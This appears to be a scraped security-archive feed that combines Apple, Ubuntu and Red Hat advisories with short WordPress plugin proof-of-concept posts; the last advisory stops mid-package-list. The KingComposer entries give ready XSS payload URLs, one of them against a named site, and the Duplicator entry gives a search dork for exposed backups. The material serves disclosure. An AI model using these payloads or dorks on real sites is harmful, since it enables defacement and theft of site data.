Apple Security Advisory 2023-07-24-1 - Safari 16.6 addresses bypass and code execution vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

APPLE-SA-2023-07-24-1 Safari 16.6

Safari 16.6 addresses the following issues.  
Information about the security content is also available at  
https://support.apple.com/kb/HT213847.

Apple maintains a Security Updates page at  
https://support.apple.com/HT201222 which lists recent  
software updates with security advisories.

WebKit  
Available for: macOS Big Sur and macOS Monterey  
Impact: A website may be able to bypass Same Origin Policy  
Description: The issue was addressed with improved checks.  
WebKit Bugzilla: 256549  
CVE-2023-38572: Narendra Bhati (twitter.com/imnarendrabhati) of Suma  
Soft Pvt. Ltd, Pune - India

WebKit  
Available for: macOS Big Sur and macOS Monterey  
Impact: Processing web content may lead to arbitrary code execution  
Description: The issue was addressed with improved checks.  
WebKit Bugzilla: 256865  
CVE-2023-38594: Yuhao Hu  
WebKit Bugzilla: 256573  
CVE-2023-38595: an anonymous researcher, Jiming Wang, and Jikai Ren  
WebKit Bugzilla: 257387  
CVE-2023-38600: Anonymous working with Trend Micro Zero Day Initiative

WebKit  
Available for: macOS Big Sur and macOS Monterey  
Impact: Processing web content may lead to arbitrary code execution  
Description: The issue was addressed with improved memory handling.  
WebKit Bugzilla: 258058  
CVE-2023-38611: Francisco Alonso (@revskills)

WebKit Process Model  
Available for: macOS Big Sur and macOS Monterey  
Impact: Processing web content may lead to arbitrary code execution  
Description: The issue was addressed with improved checks.  
WebKit Bugzilla: 258100  
CVE-2023-38597: 이준성(Junsung Lee) of Cross Republic

WebKit Web Inspector  
Available for: macOS Big Sur and macOS Monterey  
Impact: Processing web content may disclose sensitive information  
Description: The issue was addressed with improved checks.  
WebKit Bugzilla: 256932  
CVE-2023-38133: YeongHyeon Choi (@hyeon101010)

Additional recognition

WebRTC  
We would like to acknowledge an anonymous researcher for their  
assistance.

Safari 16.6 may be obtained from the Mac App Store.  
All information is also posted on the Apple Security Updates  
web site: https://support.apple.com/en-us/HT201222.

This message is signed with Apple's Product Security PGP key,  
and details are available at:  
https://www.apple.com/support/security/pgp/  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEBP+4DupqR5Sgt1DB4RjMIDkeNxkFAmS/FLUACgkQ4RjMIDke  
NxmswA/+Ogpb238ypqmIxTWos/b/TTV2uTnDHQHuKGVBMiVy0Rh+3Cnu2GTTSLiC  
bYh2hWCXP3jarhE3/dosv7AhtYvDHYgh0fCbVCRn43rTGVMpJGSAZ3NzyfD76fPQ  
4XlaGZuf9326GGXq9lY00Ga98zA0Hf40JJzVpYXgoLopmVml8lgRyJSN1EVjXPJR  
fKJSe0y/aKHmH1qAIyVG4Q0qMVTamRCUmZwSp++UZ/gwg2E3qBTT30voPmvw1onW  
uRMdUXyh+K74/O7nan6P5z/WHuUAdRX6Hpjr7IvNcasm/KPEBOfj4lx1YwWJ592E  
F0o+d2k7awPElXMfsGTewW1HynJuis57AN808XOYjBCd+pKKlQq6NdKun87d3zxr  
RjmDdh4Yoqs3aaDckRYk8arq4g0/mKn9wSiVXwvoYC5YBePR8CQxzdP98gAqhjQM  
y9w1xPyb0Y5qCNPhPw4dk7OSrLI3y8Z+BWdMc/TIO+GOHYMdM4BtUoZ/M5T3Nqgb  
++EAggF5ajSJXmHNEVS5zLDcuP+HSYqQphqc8y6WMmWHM8tLA53OWiTDMSHP5n0x  
OFdgAYgegvc2dDbhDjVMAaVJuWqMKtsnIO//1+9ffBk4QSkQUZwGk3ybO+r27V4a  
1NzO/xMvepp/ZHj+R7j+bE4KVw6bPX43agaE+00WMMx+TqVXa4c=  
=RW2J  
-----END PGP SIGNATURE-----

Apple Security Advisory 2023-07-24-1

Ubuntu Security Notice 6241-1 - Jan Wasilewski and Gorka Eguileor discovered that OpenStack incorrectly handled deleted volume attachments. An authenticated user or attacker could possibly use this issue to gain access to sensitive information.

==========================================================================  
Ubuntu Security Notice USN-6241-1  
July 24, 2023

cinder, ironic, nova, python-glance-store, python-os-brick vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 23.04  
- Ubuntu 22.04 LTS

Summary:

OpenStack could be made to expose sensitive information.

Software Description:  
- cinder: OpenStack storage service  
- ironic: Openstack bare metal provisioning service  
- nova: OpenStack Compute cloud infrastructure  
- python-glance-store: OpenStack Image Service store library  
- python-os-brick: Library for managing local volume attaches

Details:

Jan Wasilewski and Gorka Eguileor discovered that OpenStack incorrectly  
handled deleted volume attachments. An authenticated user or attacker could  
possibly use this issue to gain access to sensitive information.

This update may require configuration changes, please see the upstream  
advisory and the other links below for more information:

https://security.openstack.org/ossa/OSSA-2023-003.html  
https://discourse.ubuntu.com/t/cve-2023-2088-for-charmed-openstack/37051  
https://lists.openstack.org/pipermail/openstack-discuss/2023-July/034439.html

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 23.04:  
   python3-cinder                  2:22.0.0-0ubuntu1.3  
   python3-glance-store            4.3.0-0ubuntu1.3  
   python3-ironic                  1:21.4.0-0ubuntu1.1  
   python3-nova                    3:27.0.0-0ubuntu1.3  
   python3-os-brick                6.2.0-0ubuntu2.3

Ubuntu 22.04 LTS:  
   python3-cinder                  2:20.2.0-0ubuntu1.1  
   python3-glance-store            3.0.0-0ubuntu1.3  
   python3-ironic                  1:20.1.0-0ubuntu1.1  
   python3-nova                    3:25.1.1-0ubuntu1.1  
   python3-os-brick                5.2.2-0ubuntu1.2

In general, a standard system update will make all the necessary changes.

References:  
   https://ubuntu.com/security/notices/USN-6241-1  
   CVE-2023-2088

Package Information:  
   https://launchpad.net/ubuntu/+source/cinder/2:22.0.0-0ubuntu1.3  
   https://launchpad.net/ubuntu/+source/ironic/1:21.4.0-0ubuntu1.1  
   https://launchpad.net/ubuntu/+source/nova/3:27.0.0-0ubuntu1.3  
   https://launchpad.net/ubuntu/+source/python-glance-store/4.3.0-0ubuntu1.3  
   https://launchpad.net/ubuntu/+source/python-os-brick/6.2.0-0ubuntu2.3  
   https://launchpad.net/ubuntu/+source/cinder/2:20.2.0-0ubuntu1.1  
   https://launchpad.net/ubuntu/+source/ironic/1:20.1.0-0ubuntu1.1  
   https://launchpad.net/ubuntu/+source/nova/3:25.1.1-0ubuntu1.1  
   https://launchpad.net/ubuntu/+source/python-glance-store/3.0.0-0ubuntu1.3  
   https://launchpad.net/ubuntu/+source/python-os-brick/5.2.2-0ubuntu1.2

Ubuntu Security Notice USN-6241-1

WordPress Page Builder KingComposer plugin version 2.9.6 suffers from a cross site scripting vulnerability.

**WordPress Page Builder KingComposer 2.9.6 Cross Site Scripting**

Posted Jul 25, 2023

Authored by indoushka

WordPress Page Builder KingComposer plugin version 2.9.6 suffers from a cross site scripting vulnerability.

tags | exploit, xss

SHA-256 | 13a1ca560e74613eb2d4517f0addb6da665a264ecdfd2a0a3388354bd3480ea9

Download | Favorite | View

**WordPress Page Builder KingComposer 2.9.6 Cross Site Scripting**

    ====================================================================================================================================| # Title     : WordPress Page Builder KingComposer 2.9.6 XSS Vulnerability                                                        || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit)                                               | | # Vendor    : https://kingcomposer.com/                                                                                          |  ====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : /wp-admin/admin-ajax.php?action=kc_get_thumbn&type=filter_url&id=<marquee><font color=lime size=32>Hacked by indoushka</font></marquee>[+] https://visitsafinet/wp-admin/admin-ajax.php?action=kc_get_thumbn&type=filter_url&id=<marquee><font color=lime size=32>Hacked by indoushka</font></marquee>Greetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (81,749)
*   Arbitrary (16,156)
*   BBS (2,859)
*   Bypass (1,735)
*   CGI (1,025)
*   Code Execution (7,240)
*   Conference (679)
*   Cracker (841)
*   CSRF (3,335)
*   DoS (23,366)
*   Encryption (2,365)
*   Exploit (51,659)
*   File Inclusion (4,213)
*   File Upload (967)
*   Firewall (821)
*   Info Disclosure (2,756)
*   Intrusion Detection (891)
*   Java (3,036)
*   JavaScript (851)
*   Kernel (6,644)
*   Local (14,428)
*   Magazine (586)
*   Overflow (12,666)
*   Perl (1,423)
*   PHP (5,139)
*   Proof of Concept (2,338)
*   Protocol (3,583)
*   Python (1,531)
*   Remote (30,674)
*   Root (3,576)
*   Rootkit (508)
*   Ruby (612)
*   Scanner (1,638)
*   Security Tool (7,877)
*   Shell (3,177)
*   Shellcode (1,212)
*   Sniffer (894)
*   Spoof (2,196)
*   SQL Injection (16,312)
*   TCP (2,397)
*   Trojan (687)
*   UDP (885)
*   Virus (664)
*   Vulnerability (31,716)
*   Web (9,624)
*   Whitepaper (3,748)
*   x86 (961)
*   XSS (17,879)
*   Other

**File Archives**

*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   August 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (1,995)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,922)
*   Debian (6,794)
*   Fedora (1,691)
*   FreeBSD (1,244)
*   Gentoo (4,322)
*   HPUX (879)
*   iOS (349)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (46,251)
*   Mac OS X (685)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (484)
*   RedHat (13,603)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,760)
*   UNIX (9,270)
*   UnixWare (186)
*   Windows (6,565)
*   Other

WordPress Page Builder KingComposer 2.9.6 Cross Site Scripting

WordPress Page Builder KingComposer plugin version 2.8.1 suffers from a cross site scripting vulnerability.

    ====================================================================================================================================| # Title     : WordPress Page Builder KingComposer 2.8.1 XSS Vulnerability                                                        || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit)                                               | | # Vendor    : https://kingcomposer.com/                                                                                          |  ====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : /wp-admin/admin.php?page=kc-mapper&id=<%2Fscript><script>alert(1)<%2Fscript>[+] http://192.168.0.103/wordpress/wp-admin/admin.php?page=kc-mapper&id=<%2Fscript><script>alert(1)<%2Fscript>Greetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

WordPress Page Builder KingComposer 2.8.1 Cross Site Scripting

WordPress Duplicator plugin version 3.8.7 appears to leave backups in a world accessible directory under the document root.

    ====================================================================================================================================| # Title     : WordPress - Duplicator 3.8.7 Backup Disclosure Vulnerability                                                       || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 108.0.2(64-bit)                                            | | # Vendor    : https://snapcreek.com/duplicator/docs/changelog/                                                                   |  | # Dork      : "/wp-content/backups-dup-pro/"                                                                                     |====================================================================================================================================P0C :[+] appears to leave backups in a world accessible directory under the document root & The plugin exports a backup exported as a text file and contains sensitive informations.[+] Dorking İn Google Or Other Search Enggine.[+] Use payload : "/wp-content/backups-dup-pro/"[+] https://127.0.0.1/pfauen.de/wp-content/backups-dup-pro/Greetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm * thelastvvv *Zigoo.eg                      |=======================================================================================================================================

WordPress Duplicator 3.8.7 Backup Disclosure

Red Hat Security Advisory 2023-4262-01 - This is a kernel live patch module which is automatically loaded by the RPM post-install script to modify the code of a running kernel. Issues addressed include privilege escalation and use-after-free vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: kpatch-patch security update  
Advisory ID:       RHSA-2023:4262-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:4262  
Issue date:        2023-07-25  
CVE Names:         CVE-2023-1281 CVE-2023-32233   
=====================================================================

1. Summary:

An update for kpatch-patch is now available for Red Hat Enterprise Linux  
8.4 Update Services for SAP Solutions.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux BaseOS E4S (v.8.4) - ppc64le, x86_64

3. Description:

This is a kernel live patch module which is automatically loaded by the RPM  
post-install script to modify the code of a running kernel.

Security Fix(es):

* kernel: tcindex: use-after-free vulnerability in traffic control index  
filter allows privilege escalation (CVE-2023-1281)

* kernel: netfilter: use-after-free in nf_tables when processing batch  
requests can lead to privilege escalation (CVE-2023-32233)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2181847 - CVE-2023-1281 kernel: tcindex: use-after-free vulnerability in traffic control index filter allows privilege escalation  
2196105 - CVE-2023-32233 kernel: netfilter: use-after-free in nf_tables when processing batch requests can lead to privilege escalation

6. Package List:

Red Hat Enterprise Linux BaseOS E4S (v.8.4):

Source:  
kpatch-patch-4_18_0-305_76_1-1-4.el8_4.src.rpm  
kpatch-patch-4_18_0-305_82_1-1-3.el8_4.src.rpm  
kpatch-patch-4_18_0-305_86_2-1-2.el8_4.src.rpm  
kpatch-patch-4_18_0-305_88_1-1-2.el8_4.src.rpm  
kpatch-patch-4_18_0-305_91_1-1-1.el8_4.src.rpm

ppc64le:  
kpatch-patch-4_18_0-305_76_1-1-4.el8_4.ppc64le.rpm  
kpatch-patch-4_18_0-305_76_1-debuginfo-1-4.el8_4.ppc64le.rpm  
kpatch-patch-4_18_0-305_76_1-debugsource-1-4.el8_4.ppc64le.rpm  
kpatch-patch-4_18_0-305_82_1-1-3.el8_4.ppc64le.rpm  
kpatch-patch-4_18_0-305_82_1-debuginfo-1-3.el8_4.ppc64le.rpm  
kpatch-patch-4_18_0-305_82_1-debugsource-1-3.el8_4.ppc64le.rpm  
kpatch-patch-4_18_0-305_86_2-1-2.el8_4.ppc64le.rpm  
kpatch-patch-4_18_0-305_86_2-debuginfo-1-2.el8_4.ppc64le.rpm  
kpatch-patch-4_18_0-305_86_2-debugsource-1-2.el8_4.ppc64le.rpm  
kpatch-patch-4_18_0-305_88_1-1-2.el8_4.ppc64le.rpm  
kpatch-patch-4_18_0-305_88_1-debuginfo-1-2.el8_4.ppc64le.rpm  
kpatch-patch-4_18_0-305_88_1-debugsource-1-2.el8_4.ppc64le.rpm  
kpatch-patch-4_18_0-305_91_1-1-1.el8_4.ppc64le.rpm  
kpatch-patch-4_18_0-305_91_1-debuginfo-1-1.el8_4.ppc64le.rpm  
kpatch-patch-4_18_0-305_91_1-debugsource-1-1.el8_4.ppc64le.rpm

x86_64:  
kpatch-patch-4_18_0-305_76_1-1-4.el8_4.x86_64.rpm  
kpatch-patch-4_18_0-305_76_1-debuginfo-1-4.el8_4.x86_64.rpm  
kpatch-patch-4_18_0-305_76_1-debugsource-1-4.el8_4.x86_64.rpm  
kpatch-patch-4_18_0-305_82_1-1-3.el8_4.x86_64.rpm  
kpatch-patch-4_18_0-305_82_1-debuginfo-1-3.el8_4.x86_64.rpm  
kpatch-patch-4_18_0-305_82_1-debugsource-1-3.el8_4.x86_64.rpm  
kpatch-patch-4_18_0-305_86_2-1-2.el8_4.x86_64.rpm  
kpatch-patch-4_18_0-305_86_2-debuginfo-1-2.el8_4.x86_64.rpm  
kpatch-patch-4_18_0-305_86_2-debugsource-1-2.el8_4.x86_64.rpm  
kpatch-patch-4_18_0-305_88_1-1-2.el8_4.x86_64.rpm  
kpatch-patch-4_18_0-305_88_1-debuginfo-1-2.el8_4.x86_64.rpm  
kpatch-patch-4_18_0-305_88_1-debugsource-1-2.el8_4.x86_64.rpm  
kpatch-patch-4_18_0-305_91_1-1-1.el8_4.x86_64.rpm  
kpatch-patch-4_18_0-305_91_1-debuginfo-1-1.el8_4.x86_64.rpm  
kpatch-patch-4_18_0-305_91_1-debugsource-1-1.el8_4.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-1281  
https://access.redhat.com/security/cve/CVE-2023-32233  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIcBAEBCAAGBQJkv4XDAAoJENzjgjWX9erEL98P/2wLaGeuiNwvEkO+VOfuyueR  
AFq2d5aiWBvCH5p0LE07Ei6MfvGQJVmAMhJNQsGdyQmtEaz1QDM5+HFsUN71s59P  
WrEAmdamcZvCMmxMAYstEfAQqPVNt4bdC4h5USWRb1fmXiwbo58mvWuHqcidOemi  
MOhJF2VxvfAj+LoFWmiz5yKsNz0iQIq5/+LXZ1Ny6RBYoAIqjyMqdkyfNE9I65wf  
RyVjCWmlYfb1hXyGZDcj/MvuCxUTVfPtl9G/a4dwG8NzuZYCLSUPaJAuKDddOMsm  
fqPdB5CapM7elYmGROz253gC1QaeLx9kKo3Xq9FqXUfwXincuve4xCARkkxcfoTt  
1tUUsngyDJRDPXJSLh+TaCNcybPs3EkTC8SbzXqDy4AX4EfhbA0sW1Z0MQJAfcnQ  
foETLI4/yMoG7pNrCpPzmCYPCqi39DYDvIDlWw5FHjFFyUhYW4iWY+hxjmXJyopD  
lOUjkSYdhZNYaZrfMAhTSyoysbpSjvQharPGYH3ChE544Ntg048JK+5pjTjgjLt2  
60MrSG9vOfDV2XTJ/aIfYKZmkn12ygLOAwYIasPO8p6Iwb8e6vLmDL2Vn+sQf30E  
DO6rdvrjGx4EucaX+1Sv6v74tLvj2C1UQdm3XSuH4fZuPRj2SVC6F8akfe4tRlB0  
PvEc8DjF+pzdE9LFTMff  
=lzMX  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-4262-01

Red Hat Security Advisory 2023-4256-01 - The kernel packages contain the Linux kernel, the core of any Linux operating system. Issues addressed include privilege escalation and use-after-free vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: kernel security and bug fix update  
Advisory ID:       RHSA-2023:4256-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:4256  
Issue date:        2023-07-25  
CVE Names:         CVE-2023-1281 CVE-2023-32233   
=====================================================================

1. Summary:

An update for kernel is now available for Red Hat Enterprise Linux 8.4  
Advanced Mission Critical Update Support, Red Hat Enterprise Linux 8.4  
Telecommunications Update Service, and Red Hat Enterprise Linux 8.4 Update  
Services for SAP Solutions.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux BaseOS AUS (v.8.4) - noarch, x86_64  
Red Hat Enterprise Linux BaseOS E4S (v.8.4) - aarch64, noarch, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux BaseOS TUS (v.8.4) - aarch64, noarch, ppc64le, s390x, x86_64

3. Description:

The kernel packages contain the Linux kernel, the core of any Linux  
operating system.

Security Fix(es):

* kernel: tcindex: use-after-free vulnerability in traffic control index  
filter allows privilege escalation (CVE-2023-1281)

* kernel: netfilter: use-after-free in nf_tables when processing batch  
requests can lead to privilege escalation (CVE-2023-32233)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

Bug Fix(es):

* s390/qeth: cache link_info for ethtool (BZ#2174365)

* RHEL8.4 - kernel: fix __clear_user() inline assembly constraints  
(BZ#2192605)

* ice: ptp4l cpu usage spikes (BZ#2203288)

* 40%~70% block performance regression for localfs backend write between  
kernel-4.18.0-235.el8.x86_64 and kernel-4.18.0-277.el8.x86_64 (BZ#2204516)

* Invalid character detected by rpminspect in  
Documentation/translations/zh_CN/process/magic-number.rst (BZ#2208287)

* simultaneous writes to a page on xfs can result in zero-byte data  
(BZ#2208413)

* Windows Server 2019 guest randomly pauses with "KVM: entry failed,  
hardware error 0x80000021" [rhel8.8GA] (BZ#2211662)

* [Marvell 8.7 Bug] qedi shutdown handler hangs upon reboot (BZ#2215333)

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

The system must be rebooted for this update to take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2181847 - CVE-2023-1281 kernel: tcindex: use-after-free vulnerability in traffic control index filter allows privilege escalation  
2196105 - CVE-2023-32233 kernel: netfilter: use-after-free in nf_tables when processing batch requests can lead to privilege escalation

6. Package List:

Red Hat Enterprise Linux BaseOS AUS (v.8.4):

Source:  
kernel-4.18.0-305.97.1.el8_4.src.rpm

noarch:  
kernel-abi-stablelists-4.18.0-305.97.1.el8_4.noarch.rpm  
kernel-doc-4.18.0-305.97.1.el8_4.noarch.rpm

x86_64:  
bpftool-4.18.0-305.97.1.el8_4.x86_64.rpm  
bpftool-debuginfo-4.18.0-305.97.1.el8_4.x86_64.rpm  
kernel-4.18.0-305.97.1.el8_4.x86_64.rpm  
kernel-core-4.18.0-305.97.1.el8_4.x86_64.rpm  
kernel-cross-headers-4.18.0-305.97.1.el8_4.x86_64.rpm  
kernel-debug-4.18.0-305.97.1.el8_4.x86_64.rpm  
kernel-debug-core-4.18.0-305.97.1.el8_4.x86_64.rpm  
kernel-debug-debuginfo-4.18.0-305.97.1.el8_4.x86_64.rpm  
kernel-debug-devel-4.18.0-305.97.1.el8_4.x86_64.rpm  
kernel-debug-modules-4.18.0-305.97.1.el8_4.x86_64.rpm  
kernel-debug-modules-extra-4.18.0-305.97.1.el8_4.x86_64.rpm  
kernel-debuginfo-4.18.0-305.97.1.el8_4.x86_64.rpm  
kernel-debuginfo-common-x86_64-4.18.0-305.97.1.el8_4.x86_64.rpm  
kernel-devel-4.18.0-305.97.1.el8_4.x86_64.rpm  
kernel-headers-4.18.0-305.97.1.el8_4.x86_64.rpm  
kernel-modules-4.18.0-305.97.1.el8_4.x86_64.rpm  
kernel-modules-extra-4.18.0-305.97.1.el8_4.x86_64.rpm  
kernel-tools-4.18.0-305.97.1.el8_4.x86_64.rpm  
kernel-tools-debuginfo-4.18.0-305.97.1.el8_4.x86_64.rpm  
kernel-tools-libs-4.18.0-305.97.1.el8_4.x86_64.rpm  
perf-4.18.0-305.97.1.el8_4.x86_64.rpm  
perf-debuginfo-4.18.0-305.97.1.el8_4.x86_64.rpm  
python3-perf-4.18.0-305.97.1.el8_4.x86_64.rpm  
python3-perf-debuginfo-4.18.0-305.97.1.el8_4.x86_64.rpm

Red Hat Enterprise Linux BaseOS E4S (v.8.4):

Source:  
kernel-4.18.0-305.97.1.el8_4.src.rpm

aarch64:  
bpftool-4.18.0-305.97.1.el8_4.aarch64.rpm  
bpftool-debuginfo-4.18.0-305.97.1.el8_4.aarch64.rpm  
kernel-4.18.0-305.97.1.el8_4.aarch64.rpm  
kernel-core-4.18.0-305.97.1.el8_4.aarch64.rpm  
kernel-cross-headers-4.18.0-305.97.1.el8_4.aarch64.rpm  
kernel-debug-4.18.0-305.97.1.el8_4.aarch64.rpm  
kernel-debug-core-4.18.0-305.97.1.el8_4.aarch64.rpm  
kernel-debug-debuginfo-4.18.0-305.97.1.el8_4.aarch64.rpm  
kernel-debug-devel-4.18.0-305.97.1.el8_4.aarch64.rpm  
kernel-debug-modules-4.18.0-305.97.1.el8_4.aarch64.rpm  
kernel-debug-modules-extra-4.18.0-305.97.1.el8_4.aarch64.rpm  
kernel-debuginfo-4.18.0-305.97.1.el8_4.aarch64.rpm  
kernel-debuginfo-common-aarch64-4.18.0-305.97.1.el8_4.aarch64.rpm  
kernel-devel-4.18.0-305.97.1.el8_4.aarch64.rpm  
kernel-headers-4.18.0-305.97.1.el8_4.aarch64.rpm  
kernel-modules-4.18.0-305.97.1.el8_4.aarch64.rpm  
kernel-modules-extra-4.18.0-305.97.1.el8_4.aarch64.rpm  
kernel-tools-4.18.0-305.97.1.el8_4.aarch64.rpm  
kernel-tools-debuginfo-4.18.0-305.97.1.el8_4.aarch64.rpm  
kernel-tools-libs-4.18.0-305.97.1.el8_4.aarch64.rpm  
perf-4.18.0-305.97.1.el8_4.aarch64.rpm  
perf-debuginfo-4.18.0-305.97.1.el8_4.aarch64.rpm  
python3-perf-4.18.0-305.97.1.el8_4.aarch64.rpm  
python3-perf-debuginfo-4.18.0-305.97.1.el8_4.aarch64.rpm

noarch:  
kernel-abi-stablelists-4.18.0-305.97.1.el8_4.noarch.rpm  
kernel-doc-4.18.0-305.97.1.el8_4.noarch.rpm

ppc64le:  
bpftool-4.18.0-305.97.1.el8_4.ppc64le.rpm  
bpftool-debuginfo-4.18.0-305.97.1.el8_4.ppc64le.rpm  
kernel-4.18.0-305.97.1.el8_4.ppc64le.rpm  
kernel-core-4.18.0-305.97.1.el8_4.ppc64le.rpm  
kernel-cross-headers-4.18.0-305.97.1.el8_4.ppc64le.rpm  
kernel-debug-4.18.0-305.97.1.el8_4.ppc64le.rpm  
kernel-debug-core-4.18.0-305.97.1.el8_4.ppc64le.rpm  
kernel-debug-debuginfo-4.18.0-305.97.1.el8_4.ppc64le.rpm  
kernel-debug-devel-4.18.0-305.97.1.el8_4.ppc64le.rpm  
kernel-debug-modules-4.18.0-305.97.1.el8_4.ppc64le.rpm  
kernel-debug-modules-extra-4.18.0-305.97.1.el8_4.ppc64le.rpm  
kernel-debuginfo-4.18.0-305.97.1.el8_4.ppc64le.rpm  
kernel-debuginfo-common-ppc64le-4.18.0-305.97.1.el8_4.ppc64le.rpm  
kernel-devel-4.18.0-305.97.1.el8_4.ppc64le.rpm  
kernel-headers-4.18.0-305.97.1.el8_4.ppc64le.rpm  
kernel-modules-4.18.0-305.97.1.el8_4.ppc64le.rpm  
kernel-modules-extra-4.18.0-305.97.1.el8_4.ppc64le.rpm  
kernel-tools-4.18.0-305.97.1.el8_4.ppc64le.rpm  
kernel-tools-debuginfo-4.18.0-305.97.1.el8_4.ppc64le.rpm  
kernel-tools-libs-4.18.0-305.97.1.el8_4.ppc64le.rpm  
perf-4.18.0-305.97.1.el8_4.ppc64le.rpm  
perf-debuginfo-4.18.0-305.97.1.el8_4.ppc64le.rpm  
python3-perf-4.18.0-305.97.1.el8_4.ppc64le.rpm  
python3-perf-debuginfo-4.18.0-305.97.1.el8_4.ppc64le.rpm

s390x:  
bpftool-4.18.0-305.97.1.el8_4.s390x.rpm  
bpftool-debuginfo-4.18.0-305.97.1.el8_4.s390x.rpm  
kernel-4.18.0-305.97.1.el8_4.s390x.rpm  
kernel-core-4.18.0-305.97.1.el8_4.s390x.rpm  
kernel-cross-headers-4.18.0-305.97.1.el8_4.s390x.rpm  
kernel-debug-4.18.0-305.97.1.el8_4.s390x.rpm  
kernel-debug-core-4.18.0-305.97.1.el8_4.s390x.rpm  
kernel-debug-debuginfo-4.18.0-305.97.1.el8_4.s390x.rpm  
kernel-debug-devel-4.18.0-305.97.1.el8_4.s390x.rpm  
kernel-debug-modules-4.18.0-305.97.1.el8_4.s390x.rpm  
kernel-debug-modules-extra-4.18.0-305.97.1.el8_4.s390x.rpm  
kernel-debuginfo-4.18.0-305.97.1.el8_4.s390x.rpm  
kernel-debuginfo-common-s390x-4.18.0-305.97.1.el8_4.s390x.rpm  
kernel-devel-4.18.0-305.97.1.el8_4.s390x.rpm  
kernel-headers-4.18.0-305.97.1.el8_4.s390x.rpm  
kernel-modules-4.18.0-305.97.1.el8_4.s390x.rpm  
kernel-modules-extra-4.18.0-305.97.1.el8_4.s390x.rpm  
kernel-tools-4.18.0-305.97.1.el8_4.s390x.rpm  
kernel-tools-debuginfo-4.18.0-305.97.1.el8_4.s390x.rpm  
kernel-zfcpdump-4.18.0-305.97.1.el8_4.s390x.rpm  
kernel-zfcpdump-core-4.18.0-305.97.1.el8_4.s390x.rpm  
kernel-zfcpdump-debuginfo-4.18.0-305.97.1.el8_4.s390x.rpm  
kernel-zfcpdump-devel-4.18.0-305.97.1.el8_4.s390x.rpm  
kernel-zfcpdump-modules-4.18.0-305.97.1.el8_4.s390x.rpm  
kernel-zfcpdump-modules-extra-4.18.0-305.97.1.el8_4.s390x.rpm  
perf-4.18.0-305.97.1.el8_4.s390x.rpm  
perf-debuginfo-4.18.0-305.97.1.el8_4.s390x.rpm  
python3-perf-4.18.0-305.97.1.el8_4.s390x.rpm  
python3-perf-debuginfo-4.18.0-305.97.1.el8_4.s390x.rpm

x86_64:  
bpftool-4.18.0-305.97.1.el8_4.x86_64.rpm  
bpftool-debuginfo-4.18.0-305.97.1.el8_4.x86_64.rpm  
kernel-4.18.0-305.97.1.el8_4.x86_64.rpm  
kernel-core-4.18.0-305.97.1.el8_4.x86_64.rpm  
kernel-cross-headers-4.18.0-305.97.1.el8_4.x86_64.rpm  
kernel-debug-4.18.0-305.97.1.el8_4.x86_64.rpm  
kernel-debug-core-4.18.0-305.97.1.el8_4.x86_64.rpm  
kernel-debug-debuginfo-4.18.0-305.97.1.el8_4.x86_64.rpm  
